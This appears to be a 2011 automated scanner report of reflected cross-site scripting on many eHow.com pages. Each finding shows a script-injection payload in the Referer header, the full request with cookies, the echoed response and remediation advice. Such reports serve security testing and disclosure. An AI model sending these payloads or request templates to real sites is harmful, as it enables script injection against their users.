The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d64e</script><script>alert(1)</script>164ea1f1fab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=3d64e</script><script>alert(1)</script>164ea1f1fab
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:48 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22043
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70301</script><script>alert(1)</script>68b2a8e4972 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=70301</script><script>alert(1)</script>68b2a8e4972
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:27 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71331
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Sports - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb02e</script><script>alert(1)</script>83c4d78cc01 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms_use.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=bb02e</script><script>alert(1)</script>83c4d78cc01
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:05 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73171
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Terms of Use | eHow.com</title> <meta charset= ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9ff</script><script>alert(1)</script>5579f6c3bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_227_take-pictures.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=db9ff</script><script>alert(1)</script>5579f6c3bbf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d67b</script><script>alert(1)</script>a7c5286818 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_2488_lose-weight.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=7d67b</script><script>alert(1)</script>a7c5286818
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:56 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=2488; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43110
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b85</script><script>alert(1)</script>997e8d8e83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_253_lose-weight-now.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=39b85</script><script>alert(1)</script>997e8d8e83
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5651</script><script>alert(1)</script>f5e0a2d1715 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3493_lose-weight-dieting.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d5651</script><script>alert(1)</script>f5e0a2d1715
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:56 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=3493; expires=Thu, 02-Feb-2012 15:16:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45321
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4311c</script><script>alert(1)</script>71d0e12f2ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_363_winter-sports.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=4311c</script><script>alert(1)</script>71d0e12f2ce
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:47 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:47 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49491
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Hit the Slopes for Winter Fitness - Downhill sk ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90e55</script><script>alert(1)</script>2feace9df29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3818_flu-guide.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=90e55</script><script>alert(1)</script>2feace9df29
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fca</script><script>alert(1)</script>fc7810aa163 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3990_home-security-systems-guide.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=55fca</script><script>alert(1)</script>fc7810aa163
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:41 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=3990; expires=Thu, 02-Feb-2012 15:16:41 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44535
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Security Systems Guide | eHow.com </title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a5c9</script><script>alert(1)</script>35bc6437695 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_401_home-alarms.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=7a5c9</script><script>alert(1)</script>35bc6437695
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:51 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=401; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51358
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarms - Home Alarm Systems | eHow.com </ ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b94</script><script>alert(1)</script>5e5d8da7a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4028_preparing-flu-season.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=50b94</script><script>alert(1)</script>5e5d8da7a42
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f21b</script><script>alert(1)</script>3693e48b6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4127_home-alarm-system-guide.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9f21b</script><script>alert(1)</script>3693e48b6e0
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:37 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=4127; expires=Thu, 02-Feb-2012 15:16:37 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 41825
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarm System Guide | eHow.com </title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0ca6</script><script>alert(1)</script>581ac46251c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_429_all-flu.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=f0ca6</script><script>alert(1)</script>581ac46251c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee024</script><script>alert(1)</script>fab642986c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4989_photo-sharing-101.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ee024</script><script>alert(1)</script>fab642986c6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:51 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=4989; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43021
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f643</script><script>alert(1)</script>ab7ae63df3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_49_treating-colds-flus.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=5f643</script><script>alert(1)</script>ab7ae63df3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 964df</script><script>alert(1)</script>ee96ee1016b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_5023_jog-lose-weight.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=964df</script><script>alert(1)</script>ee96ee1016b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c3e0</script><script>alert(1)</script>94ff7919eca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_689_black-white-photos.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=3c3e0</script><script>alert(1)</script>94ff7919eca
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:53 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:53 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 53252
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Take Black and White Photos - Taking Black and ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
